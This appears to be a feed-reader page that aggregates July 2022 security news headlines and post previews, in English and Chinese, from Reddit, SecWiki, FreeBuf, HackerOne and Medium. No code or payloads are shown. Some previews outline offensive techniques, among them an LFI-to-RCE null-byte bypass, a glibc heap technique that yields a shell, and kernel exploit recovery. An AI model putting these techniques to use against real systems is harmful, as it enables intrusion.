    OpenSSL 3.0.4版本在支持AVX512IFMA指令的X86_64 cpu的RSA实现中引入了一个严重的问题。这个问题使得RSA的2048位私钥实现在这样的机器上不正确,并且在计算过程...
  • Open

    Microsoft Sentinel Automation Tips & Tricks – Part 2: Playbooks
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-07-06 Review
    RSAC2022解读-人工智能安全洞察—在对抗中前进 by ourren 设计你的安全架构OKR by ourren 拟态防御技术详解(核心技术篇) by ourren Mandiant网络威胁情报分析师核心能力框架 by ourren Tetragon -- 基于 eBPF 的安全可观测性 & 运行时增强 by ourren 陆海空天一体化信息网络发展研究 by ourren 卫星“黑客”详解“卫星通信的安全缺陷” by ourren 基于图注意网络的跨安全数据库实体关系预测 by ourren 云主机AK/SK泄露利用 by ourren 跨链桥:Web3黑客必争之地 by ourren 微信小程序抓包之路 by ourren CS插件—梼杌(基于cobalt strike平台的红队自动化框架) by ourren cf: 云环境利用框架 Cloud Exploitation Framework by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-06 Review
    RSAC2022解读-人工智能安全洞察—在对抗中前进 by ourren 设计你的安全架构OKR by ourren 拟态防御技术详解(核心技术篇) by ourren Mandiant网络威胁情报分析师核心能力框架 by ourren Tetragon -- 基于 eBPF 的安全可观测性 & 运行时增强 by ourren 陆海空天一体化信息网络发展研究 by ourren 卫星“黑客”详解“卫星通信的安全缺陷” by ourren 基于图注意网络的跨安全数据库实体关系预测 by ourren 云主机AK/SK泄露利用 by ourren 跨链桥:Web3黑客必争之地 by ourren 微信小程序抓包之路 by ourren CS插件—梼杌(基于cobalt strike平台的红队自动化框架) by ourren cf: 云环境利用框架 Cloud Exploitation Framework by ourren 更多最新文章,请访问SecWiki
  • Open

    Linux Kernel Exploitation Techniques: modprobe_path
    submitted by /u/s4m4k [link] [comments]
  • Open

    made a mistake with my workflow. Should I be worried?
    I made a huge security blunder over the last couple weeks... I was running an client-sided HTML server that I could access on my localhost (127.0.0.1:5500/index.html) while developing javascript program using VS code. I was using the VS code live server extension from here https://github.com/ritwickdey/vscode-live-server which exposes port 5500 on my localhost by default. I was doing this while using public wifi for many weeks! I didn't even realize that someone could nmap the LAN and find that my port 5500 was open and they could simply go to my live server directly with their browser. My webapp has a simple X/Y axis chart where I plot some API websocket data. No user input afaik. I used the latest chrome to run the server and always keep my system updated. No SElinux though. Edited my main question: I'm just assuming worst case scenario. If the attacker got to my live server, what kind of attacks can they perform on it? Because javascript is client sided/browser based, can they extract any info out of my native system? Edit2: From my cursory research on this topic, the main forms of attack from an attacker client is social engineering. For example inserting malicious payload to a link and having me click on it to extract information from me. Other than that, exploiting any flaws inside the actual JavaScript itself, it would be like hacking themselves. The app I was testing was only front end, 100% browser based. No backend server involved at all. u/nuclear_splines comment helped me understand it better. If I'm wrong feel free to correct me here. submitted by /u/Fuzzht1 [link] [comments]
    How does an attacker know they have gained access to an internal network?
    I've always wanted to know, how does an attacker (launching at attack from the Internet) know when they have breached a network's defenses and gained access to a private / internal network? Would it be as simple as having a GUI or remote desktop configuration and seeing the desktop or GUI of some device on the internal network? Or would an attacker conduct a network / port scan to verify that they're seeing all private IP addresses and use that as evidence that they're on the inside? submitted by /u/Anontrovert [link] [comments]
    Vulnerability Alerting using software inventory
    I'm looking for services that aggregate vendor security alerts, notifications, advisories, etc. Preferably matching alerts with software inventories using a CMDB. If in any way possible (manual) government feeds would be great as well. Anyone familiar with services like these, focused on enterprises? submitted by /u/overworst [link] [comments]
    Has anyone here created an ISAC?
    Has anyone here created an ISAC for their industry / geographical region or whatever? Any tips for someone looking to start one? What model did you use? Did you charge a fee? How did you get people involved? submitted by /u/UnderstandingInfosec [link] [comments]
    Briefly connected to hotel wifi to download a game from Steam and a discord call, should I be worried?
    So I'm currently on vacation and have some down time at our hotel so I decided to try and play some games. I do not have a VPN (I know it's recommended in general but I never wanted to pay for a service and I am a little paranoid of the free ones). I actively wanted to avoid the hotel wifi so I downloaded some games onto my laptop at home on Steam but didn't do the first time startup which would not work without the internet. So I finished doing that and also decided to download another game and then disconnect from the wifi. Again later I was on my phone on a discord call with some friends and thought maybe I should try the wifi to see if the connection is better as I was thinking to myself that I was over paranoid. Well here I am now starting to stress out about it, am I at any risk of important information being stolen? As I said all I did was connect to wifi on my phone for around a minute while on a discord call, and then download stuff from Steam over an hour or so. The hotel wifi is password protected but I do not believe it has wpa2 (not very familiar with network stuff) or anything like that. submitted by /u/mrahma [link] [comments]
    Very long uninstall
    I recently installed an app on my Windows 10 machine that is very graphics intensive. I took a look at it and decided to uninstall. The installer reported an estimated 30 minutes to uninstall the software which made me suspect it was doing something more than uninstalling. I contacted the developer who was very responsive and told me that this was normal. I went ahead with the uninstall which ended up taking over 20 minutes but I also fired up Wireshark and captured a PCAP file during the process. I'm a complete n00b at this point and was wondering if someone might be willing to look at the file for anything nefarious. I'm also curious if there is a legitimate reason that the uninstall should take that long. submitted by /u/Danno_ST [link] [comments]
    How does an IP address get spoofed?
    Is it possible to mask an ip address with another. If so, how? submitted by /u/iExtrapolate314 [link] [comments]
  • Open

    Optimizing CI/CD Credential Hygiene – A Comparison of CI/CD Solutions
    submitted by /u/TupleType1 [link] [comments]
  • Open

    Continuous testing, continuous security
    A talk with our Red Team lead, Gabriel Franco Continue reading on Faraday »
    HACKER DOUBLE SUMMER 2022 GUIDES —Part Two: Capture The Flags
    Welcome to the DCG 201 guide to Hacker Double Summer! This is part of a series where we are going to cover all the various hacker… Continue reading on Medium »
  • Open

    【内含福利】倒计时1天!CIS大会夏日版即将启航
    7月8日上午9点,我们在CIS大会夏日版官网见!
    FreeBuf早报 | NPM供应链攻击影响数百个网站;英国军队社交媒体账户被劫持
    英国军队社交媒体账户被劫持。
    洞见:数据治理与数据安全治理思考
    数据治理是组织中涉及数据使用的一整套管理行为,包括数据治理计划、监控、实施。
    入侵数百个网站和程序,NPM供应链攻击造成的影响不可估量
    近期,NPM供应链攻击破坏了数百个应用和网站。
    新勒索软件RedAlert来袭!已有Windows、Linux等服务器中招
    一种名为RedAlert的新勒索软件对企业网络进行攻击,目前已经有Windows和Linux VMWare ESXi系统中招。
    实战基于KMDF的磁盘写保护
    本文简单讲下基于KMDF的磁盘写保护功能如何实现。
  • Open

    I took the SANS GCFE exam and this wall of text is what happened next
    Who/What/Where/When: 2 weeks yore, I passed the GCFE exam with a score of 91%. I'm a Security Engineer with a (now) 8-pack of certs. This was my 2nd SANS cert after GCIH. I took the exam remotely proctored and found the experience to be much smoother than my experience in the year of 2020 yore. How / 9 Observations: The course handouts were my dear friends during my 3-hours of need. Give them a thorough review before the test and bring those you might find useful with you to the exam. I made a target timetable (tinyurl.com/yckv9jy8) which helped me to keep track of my exam pacing. Had I not had this, I would have inevitably wasted precious neuron cycles calculating my remaining time. This helped to keep me focused and strategize when to spend extra time on questions. I took a more b…
  • Open

    Undetected from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Undetected from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Undetected from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    .NET 反序列化漏洞之绕过 SerializationBinder 不安全的类型绑定
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/F2jFMkmN3K9yn_uuICStuA 概述 很多 .NET 应用程序在修复 BinaryFormatter 、 SoapFormatter 、LosFormatter 、 NetDataContractSerializer 、ObjectStateFormatter 等反序列化漏洞时,喜欢通过自定义 Se...
  • Open

    .NET 反序列化漏洞之绕过 SerializationBinder 不安全的类型绑定
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/F2jFMkmN3K9yn_uuICStuA 概述 很多 .NET 应用程序在修复 BinaryFormatter 、 SoapFormatter 、LosFormatter 、 NetDataContractSerializer 、ObjectStateFormatter 等反序列化漏洞时,喜欢通过自定义 Se...
  • Open

    Abusing functionality to exploit a super SSRF in Jira Server (CVE-2022-26135)
    Article URL: https://blog.assetnote.io/2022/06/26/exploiting-ssrf-in-jira/ Comments URL: https://news.ycombinator.com/item?id=31995638 Points: 1 # Comments: 0

  • Open

    Microscopes and Optics in General
    submitted by /u/mrcanard [link] [comments]
    pictures of landmines.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    photos of illegally dumped rubbish in Bayview, California.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    All fortnite models with the .blend extension (google drive)
    Chapter 1 models: https://drive.google.com/drive/folders/13XwAQX770Rkb5Qx-XFKYjlyn130OOGjj Chapter 2 models: https://drive.google.com/drive/folders/1L2wa9TMRwdbRjK_FgnX-u2KvBPxDxR_z ​ (credits are in the 'please read' doc) submitted by /u/ethansean0607 [link] [comments]
    Indiana Military history
    http://indianamilitary.org/ATTERBURYAAF/ http://indianamilitary.org/Bakalar%20AFB/ http://indianamilitary.org/Camp%20Atterbury/ http://indianamilitary.org/FtHarrison/ http://indianamilitary.org/WakemanHospital/ http://indianamilitary.org/28TH/ http://indianamilitary.org/30TH/ http://indianamilitary.org/31STINFDIV/ http://indianamilitary.org/83RD/ http://indianamilitary.org/92nd/ http://indianamilitary.org/106ID/ http://indianamilitary.org/CA%20POWs/ http://indianamilitary.org/German%20PW%20Camps/ http://indianamilitary.org/CoD151Ranger/ http://indianamilitary.org/Misc/ http://indianamilitary.org/YANK/ http://indianamilitary.org/StarsStripes/ http://indianamilitary.org/ROSTERs/ ​ Some army manuals, unit history books, and Army published newspapers and magazines. Mostly WW2 material from what I could tell. submitted by /u/c-rn [link] [comments]
  • Open

    Abusing functionality to exploit a super SSRF in Jira Server (CVE-2022-26135)
    submitted by /u/Mempodipper [link] [comments]
    From NtObjectManager to PetitPotam
    submitted by /u/onlinereadme [link] [comments]
  • Open

    Re-architecture of lab environment: workstations vs. server?
    Hey guys, currently I'm tasked to create a draft for our new forensics lab. We use one workstation per case/analyst in our current setup (5 in total). All of them have a fairly big RAID. Our current workloads are mainly analysing triage packages, full images and logs. Once half a year we get a small eDiscovery from our internal compliance department with ~10 GB/case. All of them are from ~2016 with 20 physical cores, 128 GB RAM and two RAIDs for evidence files and case files. Both of them are ~12 TB net. I want to build a "modern lab environment". Goals I try to achieve after the re-architecture: * Hassle-free usage of evidence/images for multiple analysts * A good working environment with less noise pollution * Maintain high performance for CPU-intensive tasks (e. g. Nuix Workstation…
    Recover Bitlocker Drive that has been formatted
    Is it possible to recover data from a "bitlocked" drive that has been formatted with a new windows install? In my mind, even if you could recover the data from the slackspace it would all be garbage unless you run the decryption function on it which I don't think is possible unless you're able to reconstruct enough of the drive to be able to decrypt it with the recovery key. submitted by /u/Tight_Candidate_2293 [link] [comments]
    Google Photo Cache?
    Hello everyone! With Magnet Axiom I find an image inside "com.google.android.apps.photos\cache\glide_cache" at 23:50. What does this mean? That the image was displayed at that time, or was it generated by the system? submitted by /u/Zipper_Ita [link] [comments]
  • Open

    Bellatrix( VulHub)
    Hello and welcome. I wanted to get a writeup out there on my favorite series and talk of the year , “Harry Potter and the Road to OSCP” ok… Continue reading on Medium »
  • Open

    How easy is it to create a burner laptop?
    I'm a joe schmoe with little info sec knowledge. How feasible would it be for me to purchase a cheap laptop/chromebook and set it up in a way that my web surfing habits wouldn't be able to be tracked back to me specifically? My personal/work machines are both plugged in to all of my personal accounts already. Would it be enough to just buy a laptop and keep my personal accounts off of it, or would i have to set up a VPN for it/jump through any other hoops? I don't work in a field with sensitive data or anything like that, so it wouldn't have to be locked up airtight. I'm mostly just interested in shrinking my digital footprint and protecting my privacy. Apologies if I'm in the wrong place - just steer me in the right direction if that's the case. Thanks - submitted by /u/Lt_AldoRaine_ [link] [comments]
    Hardening [unsecure] 2-layer Architecture Applications
    Hello /r/AskNetsec Working in Application Security within a legacy-software abundant landscape company, sometimes we come across situations where we are tasked with proposing security requirements and architectural security improvements to applications that are, by-default, unsecure due to their 2-layer architecture. Example: A thick-client application running on users' workstations or VDI that communicates directly with the database instead of having a back-end logic server behind. In these cases, we find it hard to propose meaningful security improvements because the design is flawed by default - however business requirements often don't allow us to demand a full architecture refactor or replacing the solution. For these cases, which would be other areas of improvement that you'd propose in terms of security requirements, architectural tweaks, etc. - so we can have something to show for and improve the security as much as we can given the constraint in place. Thanks! submitted by /u/FabioFreitas [link] [comments]
  • Open

    SSRF via Office file thumbnails
    Slack disclosed a bug submitted by ziot: https://hackerone.com/reports/671935 - Bounty: $4000
    Exposure of a valid Gitlab-Workhorse JWT leading to various bad things
    GitLab disclosed a bug submitted by ledz1996: https://hackerone.com/reports/1040786 - Bounty: $10000
    Reflected Cross site Scripting (XSS) on https://one.newrelic.com
    New Relic disclosed a bug submitted by sairanga: https://hackerone.com/reports/1367642 - Bounty: $2048
    Reflected XSS on https://wwwapps.ups.com/ctc/request?loc=
    UPS VDP disclosed a bug submitted by 3amoura: https://hackerone.com/reports/1536461
  • Open

    War in Ukraine / July 4
    Russia continues its offensive in Donbas Continue reading on Medium »
    How to use Creepy Tool for Beginner
    All we have to do is choose the platform-appropriate version and install it. After installing Creepy, the next step is to configure the… Continue reading on Medium »
    Thoughts from an OSINT Newbie…
    For the past few weeks, I have been interested in changing careers to work as an OSINT Investigator. Continue reading on Medium »
    Brand Intelligence: How to use OSINT in an organization
    Hello cybersecurity folks, I know you are skilled at defending your network and other infrastructures from cyber attacks. Yeah, I know you… Continue reading on Medium »
    Top 7 Free Open Source Intelligence Hacking Tools For Beginners
    Open Source Intelligence (OSINT) Continue reading on Medium »
    Coletando informações de discentes, docentes, servidores e tercerizados da UFRN
    Olá Pessoal, faz muito de tempo que não escrevo um artigo relativo a segurança da informação no medium (Estava esperando algo legal… Continue reading on Medium »
  • Open

    How To Use Foundry To PoC Bug Leads, Part 1
    You’ve probably heard about all of the epic disclosures in the Web3 bug bounty space recently and decided that maybe it’s time to pave… Continue reading on Immunefi »
    Get Rich by Finding Bugs
    These websites will pay you for it Continue reading on Level Up Coding »
    rDEX V2 is Deployed on StaFiHub Testnet with The Bug Bounty Program.
    Continue reading on Medium »
    How I find open redirect in Facebook
    Hi Guys Continue reading on Medium »
    rDEX V2 is Deployed on the StaFiHub Testnet with The Bug Bounty Program
    Overview Continue reading on StaFi »
    How To Get Start Into Bug Bounty By Kidnapshadow
    Hello everyone, After a lot of requests and questions on topics related to Bug Bounty like how to start, how to beat duplicates, what to… Continue reading on Medium »
    XSScope-GUI Framework for XSS Clientside attacks
    The most cutting-edge GUI Framework for XSS Client-side attacks is called XSScope. It is capable of real-time HTML injections and various… Continue reading on Medium »
    LFI TO RCE(PHP WRAPPERS)
    in the following target, we see that the application will always put a .php now we will have to circumvent this using a code %00(nullbyte) Continue reading on Medium »
  • Open

    SecWiki News 2022-07-05 Review
    图结构的相似度度量与分类 by ourren SecWiki周刊(第435期) by ourren 境外非政府组织在华活动分析报告(2017-2021) by ourren 从2023财年预算看美国网络发展动向 by ourren 网空测绘--就是另一形态的Google by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-05 Review
    图结构的相似度度量与分类 by ourren SecWiki周刊(第435期) by ourren 境外非政府组织在华活动分析报告(2017-2021) by ourren 从2023财年预算看美国网络发展动向 by ourren 网空测绘--就是另一形态的Google by ourren 更多最新文章,请访问SecWiki
  • Open

    A Diamond in the Ruff
    This blog post was co-authored with Charlie Clark at Semperis 1.1      Background of the ‘Diamond’ Attack One day, while browsing YouTube, we came across an older presentation from Blackhat 2015 by Tal Be’ery and Michael Cherny. In their talk, and subsequent brief, WATCHING THE WATCHDOG: PROTECTING KERBEROS AUTHENTICATION WITH NETWORK MONITORING, they outlined something we... The post A Diamond in the Ruff appeared first on TrustedSec.
  • Open

    When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors
    Penetration testing and adversary emulation tool Brute Ratel C4 is effective at defeating modern detection capabilities – and malicious actors have begun to adopt it. The post When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors appeared first on Unit 42.
  • Open

    Linear-Time Temporal Logic Guided Greybox Fuzzing
    Article URL: https://github.com/ltlfuzzer/LTL-Fuzzer Comments URL: https://news.ycombinator.com/item?id=31987389 Points: 1 # Comments: 0
  • Open

    Free webinar on threat hunting with Sigma rules
    submitted by /u/alertnoalert [link] [comments]
  • Open

    FreeBuf早报 | 北约将发展快速网络响应能力;PCI DSS 4.0发布以应对新兴威胁和技术
    全球动态1.IDC:2021年中国云工作负载安全市场规模达2.8亿美元IDC于2022年7月正式发布了针对中国云工作负载安全产品的市场份额研究报告,即:《中国云工作负载安全市场份额,2021:云原生与安全左移驱动技术持续创新》,中国市场在2021年实现了规模和增速的双爆发,市场规模达到2.8亿美元,相较2020年同比增长57.9%。 [阅读原文]2.万维网联盟拒绝谷歌和Mozilla对分散标识符(
    网络攻防演练心态调整 | FreeBuf甲方社群直播回顾
    网络攻防演练前期的准备工作,除了要做好资产梳理、管控安全接入、安全纵深防护,还要调整好心态,以积极的心态面对攻防演练。
    Chrome被爆严重零日漏洞,谷歌督促用户尽快更新
    谷歌发布公告,称已经为Windows用户发布了Chrome 103.0.5060.114更新。
    CISA命令美国联邦机构在7月22日前为CVE-2022-26925打补丁
    美国网络安全和基础设施安全局再次将CVE-2022-26925漏洞添加到已知漏洞目录中,并命令联邦文职行政部门在7月22日前执行修复。
    英国签署协议,与美国边防警卫共享生物识别数据库
    美方基于国际生物特征信息共享计划(IBIS),并在增强边境安全伙伴关系 (EBSP) 的支持下,要求引入新的签证要求。
    【直播预约】双直播间首次启用 | CIS大会夏日版5天后见
    「CIS大会夏日版·Summer Live」即将精彩来袭!
  • Open

    New Repeater features to help you test more efficiently
    If you use Burp Suite Professional or Burp Suite Community Edition for manual security testing, then you'll be familiar with tools like Burp Repeater and Burp Intruder. They make life as a tester much
  • Open

    New Repeater features to help you test more efficiently
    If you use Burp Suite Professional or Burp Suite Community Edition for manual security testing, then you'll be familiar with tools like Burp Repeater and Burp Intruder. They make life as a tester much
  • Open

    Yazamadıklarımı Marmara’ya Saldım ya da İznik’teki Ayakkabı Bağı
    Bu kadar saçma bir başlığa rağmen burayı okumaya başladıysan kendinle zorun var demektir. Continue reading on Medium »

  • Open

    Is there any way that payments can be handled in a secure way on an HTTP webpage?
    [SOLVED] I am supposed to pay for a transcript and the website wants me to enter payment in an http page with an embedded payment platform. The payment platform appears to use asp, but the webpage it is embedded in is plain html. If I click on the box for the credit card, firefox pops up a message saying that it is not an encrypted webpage and warns me about security. Obviously this sets off multiple red flags telling me that I shouldn't trust that website, but it is an official website (albeit hosted in Korea where apparently security is lax). Is there any chance that this was implemented in a secure way? How could I test it? ​ EDIT: Per the recommendation, I ran a transaction with a bogus number to try and capture the behaviour in wireshark; what I found was that initiating the transaction creates a connection on port 443 and the data seems to be sent there, so I guess it's secure? But I still don't quite trust it so I'll probably be mailing stuff. PS: I cannot share a link because my supervisor works with the people who run the site and they wouldn't want me to send a link. I'm not sure the page is even listed so they might be going for a security through obscurity thing. submitted by /u/LubbyLardo [link] [comments]
  • Open

    Crack the hash Level 2 Write-up (Free Room on TryHackMe) Cracking Salted Hashes
    Introduction Continue reading on Medium »
    What is Burp Suite
    Put simply: Burp Suite is a framework written in Java that aims to provide a one-stop-shop for web application penetration testing. Continue reading on Medium »
    Blackbird OSINT tool
    An OSINT tool to search fast for accounts by username across 131 sites. Continue reading on Medium »
    MSA Weekly 2 — Cara Menginstalasi Virtual Machine dan Web Server Nginx
    Dengan adanya perkembangan jaman anda bisa menggunakan berbagai macam OS dalam 1 komputer saja. Dengan seperti itu anda dapat menciptakan… Continue reading on Medium »
    MSA Weekly 2 — “Tutorial Instalasi Nginx Pada Kali Linux”
    Hai hai, pada kesempatan kali ini kita akan mencoba belajar untuk instalasi Nginx pada Kali linux. Nah bagi kalian yang belum pernah… Continue reading on Medium »
    HackTools-The complete Red Team add-on for Web Pentester
    HackTools is a web addon that makes it easier to perform online application penetration testing. It comes with cheat sheets and all the… Continue reading on Medium »
    Continuous Security Project [TR]
    Herkese merhaba, bu yazımda Continuos Security için geliştiriğimiz projeden bahsediyor olacağım. Continue reading on Medium »
    XSS Explained
    Cross-site scripting, also known as XSS is a security vulnerability typically found in web applications. Continue reading on Medium »
    My first ever Bug Bounty reward!
    Hello guys! Vishnu here. I am back again with yet another interesting article. Well technically, this is not the first bug I discovered,... Continue reading on Medium »
  • Open

    From Misconfigured Certificate Template to Windows Domain Admin
    submitted by /u/Kondencuotaspienas [link] [comments]
  • Open

    Blackbird OSINT tool
    An OSINT tool to search fast for accounts by username across 131 sites. Continue reading on Medium »
    War in Ukraine / July 1–3
    👉 Days of Eu Integration in Ukraine’s Parliament Continue reading on Medium »
  • Open

    SecWiki News 2022-07-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    CVE-2022–32511 | Exploit | Remote Code Execution
    No content preview
  • Open

    CVE-2022–32511 | Exploit | Remote Code Execution
    No content preview
  • Open

    CVE-2022–32511 | Exploit | Remote Code Execution
    No content preview
  • Open

    SMTP Command Injection in iCalendar Attachments to Emails via Newlines
    Nextcloud disclosed a bug submitted by spaceraccoon: https://hackerone.com/reports/1516377 - Bounty: $250
    Moderators can send messages to users from banned subreddits via `oauth.reddit.com/api/mod/conversations`
    Reddit disclosed a bug submitted by zqyzoid: https://hackerone.com/reports/1543770 - Bounty: $100
  • Open

    Is it feasible to image a 12tb storage server? What is the best storage solution for the image? Which imaging software? (Solaris os)
    Live imaging. Should i do a dd? submitted by /u/MasterBet [link] [comments]
  • Open

    Vulnerability Capstone | TryHackMe (THM)
    Lab Access: https://tryhackme.com/room/vulnerabilitycapstone Continue reading on Medium »
    TryHackMe | Red Team Fundamentals
    Learn about the basics of a red engagement, the main components and stakeholders involved. Continue reading on Medium »
    eJPT in My Point of View
    I am writing a post after about a year since I have been busy with studies and work. Nowadays a lot is going on in our country and people… Continue reading on Medium »
  • Open

    FreeBuf早报 | 欧盟举办超大规模网络安全演习;恶意软件破坏了多个美国州失业网站
    根据 Compia 公司最新发布的科技趋势报告, 网络安全在 2022 年十大高薪紧缺技能中排名第一。
    【直播享好礼】虚拟主播FreeBee首次亮相CIS大会夏日版
    「CIS大会·夏日版 Summer Live」精彩来袭!超多活动,超多福利,就等你来!
    HackerOne员工出售漏洞报告牟利
    据HackerOne表示,这名员工联系了7名HackerOne 客户,并在少数披露中获取了赏金。
    TikTok向美国立法者保证,努力保护用户数据不受中国员工的影响
    TikTok 正在试图安抚美国立法者,并表示正在采取措施 ,加强数据安全保护。
    认证账户被黑,威胁行为者借名人推特发送钓鱼信息
    近期,威胁行为者正入侵Twitter认证帐户。
    一文看懂网络安全五年之巨变
    对于网络安全来说,五年的时间,已经让整个行业发生了翻天覆地的变化;而下一个黄金发展的五年,正在缓缓拉开序幕。
    Jenkins安全团队披露了29个受0Day漏洞影响的插件
    Jenkins安全团队披露了影响Jenkins自动化服务器中29个插件的数十项缺陷,其中大部分尚未得到修复
    微软已在数百个网络中发现 Raspberry Robin 蠕虫
    微软最近在来自各个行业的数百家组织的网络中发现了蠕虫病毒——Raspberry Robin(树莓知更鸟)。
    FreeBuf早报 | TikTok中国员工能访问部分不敏感美国用户数据;HackerOne员工“监守自盗”
    TikTok CEO 周受资表示,非美国员工,包括中国员工,将能够访问一小部分不敏感的 TikTok 美国用户数据。
  • Open

    NAPALM FTP Indexer
    submitted by /u/thiskeepsmeupatnight [link] [comments]

  • Open

    Kubeclarity – SBOM and Vulnerability Detection
    Article URL: https://sectool.co/blog/kubeclarity-sbom-vulnerability-detection Comments URL: https://news.ycombinator.com/item?id=31970937 Points: 2 # Comments: 0
    A HackerOne Employee Stole Vulnerability Reports from Security Researchers
    Article URL: https://www.pcmag.com/news/a-hackerone-employee-stole-vulnerability-reports-from-security-researchers Comments URL: https://news.ycombinator.com/item?id=31970622 Points: 9 # Comments: 1
  • Open

    Geolocation #3— Finding Shoigu
    On 26th June 2022, several videos appeared on Twitter showing Sergei Shoigu, the Minister of Defence of the Russian Federation, reportedly… Continue reading on Medium »
    Good News Roundup: the OSINT-inspired Geek Edition
    In good news, OSINT explains Ukraine’s latest victories, Africa uses AI to track locusts, and BirdNet successfully IDs birds by their songs Continue reading on Medium »
    Pantellica’s Inaugural OSINT Championship
    We’re excited to announce the launch of our inaugural OSINT Championship. This initiative is yet another unique pioneering effort by… Continue reading on Medium »
    SPY NEWS: 2022 — Week 26
    Summary of the espionage-related news stories for the Week 26 (June 26-July 2) of 2022. Continue reading on Medium »
  • Open

    nday exploit: netgear orbi unauthenticated command injection (CVE-2020-27861)
    submitted by /u/0xdea [link] [comments]
    Bypassing Firefox's HTML Sanitizer API
    submitted by /u/digicat [link] [comments]
    Code replay attack on the myGovID Scheme
    submitted by /u/Gallus [link] [comments]
  • Open

    House of Gods
    Worked on a new heap technique for older versions of glibc. House of Gods hijacks the thread_arena within 8 allocs and drops a shell after 10. Works for glibc < 2.27 and was tested against 2.23, 2.24, 2.25 and 2.26 Currently trying to adapt this technique (or parts of it atleast) to recent versions of glibc. But I have yet to find a way. If you have further ideas/improvements, let me know :) https://github.com/Milo-D/house-of-gods/blob/master/HOUSE_OF_GODS.TXT Same repo contains a small PoC. submitted by /u/__milo21 [link] [comments]
    Need help restoring execution after stack overflow in windows kernel
    I'm currently trying to exploit an driver. I was able to perform a stack overflow and execute my shellcode after disabling SMEP but it's causing a BSOD just after the executing the shellcode due to the registers and stack being corrupted. I read many articles trying to understand how to restore execution after executing the shellcode but couldn't find any success. I would really appreciate if someone can help me guide through this one. If you can help me please shoot a pm. Thanks submitted by /u/DudewithCoolusername [link] [comments]
  • Open

    SecWiki News 2022-07-03 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-03 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    A swag for a Open Redirect — Google Dork — Bug Bounty
    Hello Folks 👋,I have found a good open redirect with my param scanner. I will tell you here how I found it and what kind of swag I got… Continue reading on InfoSec Write-ups »
    DNS in Active Directory
    No content preview
  • Open

    A swag for a Open Redirect — Google Dork — Bug Bounty
    Hello Folks 👋,I have found a good open redirect with my param scanner. I will tell you here how I found it and what kind of swag I got… Continue reading on InfoSec Write-ups »
    DNS in Active Directory
    No content preview
  • Open

    A swag for a Open Redirect — Google Dork — Bug Bounty
    Hello Folks 👋,I have found a good open redirect with my param scanner. I will tell you here how I found it and what kind of swag I got… Continue reading on InfoSec Write-ups »
    DNS in Active Directory
    No content preview
  • Open

    How to become a red team operator
    What is a Red Team? Continue reading on Medium »
  • Open

    What do you think is lacking in the industry nowadays?
    This may be too vague of a topic, but for those who have been in the field a while, what do you wish existed that would make your job easier/better? What do you wish you had when you were first starting out? Whether it be research, training, resources, what are some things that would benefit the DFIR world for veterans and newcomers alike? submitted by /u/Corrsta [link] [comments]

  • Open

    Purple Team | Importance and Strategical Execution of Defense
    Purple Team is a group of cybersecurity experts who play the roles of the Blue and Red Teams in a cybersecurity exercise in order to… Continue reading on Medium »
  • Open

    A roadmap for a beginner exploit dev/security research
    Hello everyone, so im just trying to find an ideal roadmap Ive been playing ctfs and solving pwn challenges and stuff so now i want to move away from the basics and get into some real targets ​ so what do you guys think i should focus on something like routers and cheap IoT devices and try to find vulns in those and try to somehow get internships / jobs based on that or should i try to focus on something like browser exploitation (which I'm interested in ) and get more knowledge browsers and stuff and try to find bugs in them (which might take a long time and find low impact bugs as compared to something like routers /IoT devices which might be more difficult ). submitted by /u/MrXy0nixOG [link] [comments]
  • Open

    SecWiki News 2022-07-02 Review
    afrog 是一款性能卓越、快速稳定、PoC 可定制化的漏洞扫描工具 by 胖胖的ALEX BlueHound-一款自研主机威胁狩猎工具 by ourren 记一次Jira的搭建和相关利用 by ourren 浅谈Shiro CVE-2022-32532 by ourren JARM指纹随机化技术实现 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-02 Review
    afrog 是一款性能卓越、快速稳定、PoC 可定制化的漏洞扫描工具 by 胖胖的ALEX BlueHound-一款自研主机威胁狩猎工具 by ourren 记一次Jira的搭建和相关利用 by ourren 浅谈Shiro CVE-2022-32532 by ourren JARM指纹随机化技术实现 by ourren 更多最新文章,请访问SecWiki
  • Open

    Insufficiently protected credentials vulnerability in fixed in curl 7.83.0
    Article URL: https://packetstormsecurity.com/files/cve/CVE-2022-27776 Comments URL: https://news.ycombinator.com/item?id=31959958 Points: 1 # Comments: 0
  • Open

    Linux Forensics
    Good morning, Does anyone have any recommendations on books for Linux Forensics? What about learning resources in general? Happy weekend and happy learning. submitted by /u/DeadBirdRugby [link] [comments]
  • Open

    Day to Day activities of an Azure admin
    Hi Team, If there are any azure administrators in this group who has shifted your career from Windows Administrator role, I just want know what are your Real-time Day-to-Day activities you are performing in your organization on azure portal as an azure admin like Application registration, VM Provisioning..etc submitted by /u/Krish03101991 [link] [comments]
  • Open

    Federated editing allows iframing possibly malicious remotes
    Nextcloud disclosed a bug submitted by rtod: https://hackerone.com/reports/1210424 - Bounty: $100
  • Open

    Fuzzing in Go
    Running fuzz tests in Go Continue reading on Go Recipes »
  • Open

    Fuzzing in Go
    Running fuzz tests in Go Continue reading on Go Recipes »
  • Open

    Bulk Analysis of Cobalt Strike’s Beacon Configurations
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    Linux 网络栈原理、监控与调优:前言
